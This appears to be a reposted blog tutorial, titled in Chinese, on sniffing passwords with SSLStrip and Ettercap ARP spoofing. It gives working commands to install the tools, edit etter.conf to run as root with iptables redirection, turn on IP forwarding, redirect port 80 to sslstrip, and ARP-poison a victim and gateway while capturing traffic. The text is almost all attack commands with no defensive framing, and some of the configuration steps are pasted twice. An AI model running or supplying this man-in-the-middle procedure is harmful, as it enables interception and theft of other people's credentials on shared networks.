利用SSLStrip & Ettercap ARP欺骗嗅探密码
apt-get purge ettercap
apt-get purge sslstrip
apt-get install ettercap
apt-get install sslstrip
[privs]
ec_uid = 65534 # nobody is the default
ec_gid = 65534 # nobody is the default
to
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
to this
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
apt-get purge sslstrip
apt-get install ettercap
apt-get install sslstrip
echo '1' > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080
# from http://blog.csdn.net/ghosttzs
[privs]
ec_uid = 65534 # nobody is the default
ec_gid = 65534 # nobody is the default
to
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
to this
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
Next information that you need is the victim ip and the gateway ip. Let's assume that the victim ip is 10.0.0.2 and the gateway is 10.0.0.1:
ettercap -Tq -i eth0 -M arp:remote /10.0.0.2/ /10.0.0.1/ -w /root/Desktop/HiRoot/test.cap
转载请注明出处